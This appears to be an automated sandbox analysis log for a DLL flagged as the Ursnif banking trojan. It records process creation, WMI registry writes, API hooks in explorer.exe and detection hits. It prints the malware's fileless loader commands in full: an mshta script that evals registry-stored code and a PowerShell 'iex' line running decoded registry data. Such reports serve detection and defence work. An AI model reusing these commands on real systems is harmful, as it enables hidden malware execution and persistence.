              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046139C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_046139C5

              System Summary:

              barindex
              Writes registry values via WMIShow sources
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD41EC7 NtMapViewOfSection,0_2_6DD41EC7
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD41B9C GetProcAddress,NtCreateSection,memset,0_2_6DD41B9C
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD42485 NtQueryVirtualMemory,0_2_6DD42485
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04612D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_04612D06
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04618005 NtQueryVirtualMemory,3_2_04618005
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04812D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_04812D06
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04818005 NtQueryVirtualMemory,4_2_04818005
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04198005 NtQueryVirtualMemory,5_2_04198005
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04192D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_04192D06
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_052F2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,6_2_052F2D06
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_052F8005 NtQueryVirtualMemory,6_2_052F8005
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD422640_2_6DD42264
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDA05340_2_6DDA0534
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDB8CB70_2_6DDB8CB7
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD9DC200_2_6DD9DC20
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD917270_2_6DD91727
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD9D6B00_2_6DD9D6B0
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD9B6170_2_6DD9B617
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDA862F0_2_6DDA862F
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDA917A0_2_6DDA917A
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD9E0500_2_6DD9E050
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDA88610_2_6DDA8861
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDB8B970_2_6DDB8B97
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD9AB670_2_6DD9AB67
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDC62C00_2_6DDC62C0
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDA8AA20_2_6DDA8AA2
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046122063_2_04612206
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046131093_2_04613109
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04617DE03_2_04617DE0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048122064_2_04812206
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04817DE04_2_04817DE0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048131094_2_04813109
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041922065_2_04192206
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041931095_2_04193109
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04197DE05_2_04197DE0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_052F31096_2_052F3109
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_052F7DE06_2_052F7DE0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_052F22066_2_052F2206
              Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6DD8E9F0 appears 35 times
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: 3a94.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              Source: classification engineClassification label: mal100.troj.evad.winDLL@24/16@7/1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0461513E CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification,3_2_0461513E
              Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{166D0566-DDEC-11EB-90E5-ECF4BB570DC9}.datJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_01
              Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF3FF9B029E5192D75.TMPJump to behavior
              Source: 3a94.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seasonthing
              Source: 3a94.dllReversingLabs: Detection: 68%
              Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3a94.dll'
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seasonthing
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seatforce
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Spaceclose
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Time
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17410 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17422 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17428 /prefetch:2
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1Jump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,SeasonthingJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,SeatforceJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,SpacecloseJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,TimeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17410 /prefetch:2Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17422 /prefetch:2Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17428 /prefetch:2Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 3a94.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdb source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdbXP source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdbXP source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp
              Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3a94.dll
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdb source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp

              Data Obfuscation:

              barindex
              Suspicious powershell command line foundShow sources
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD41F7C LoadLibraryA,GetProcAddress,0_2_6DD41F7C
              Source: 3a94.dllStatic PE information: real checksum: 0xa34b8 should be: 0xa177e
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD42253 push ecx; ret 0_2_6DD42263
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD42200 push ecx; ret 0_2_6DD42209
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDC7583 push ecx; ret 0_2_6DDC7596
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04617A60 push ecx; ret 3_2_04617A69
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04617DCF push ecx; ret 3_2_04617DDF
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04817A60 push ecx; ret 4_2_04817A69
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04817DCF push ecx; ret 4_2_04817DDF
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04197A60 push ecx; ret 5_2_04197A69
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04197DCF push ecx; ret 5_2_04197DDF
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_052F7DCF push ecx; ret 6_2_052F7DDF
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_052F7A60 push ecx; ret 6_2_052F7A69

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY
              Hooks registry keys query functions (used to hide registry keys)Show sources
              Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
              Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
              Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
              Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
              Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
              Modifies the prolog of user mode functions (user mode inline hooks)Show sources
              Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
              Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
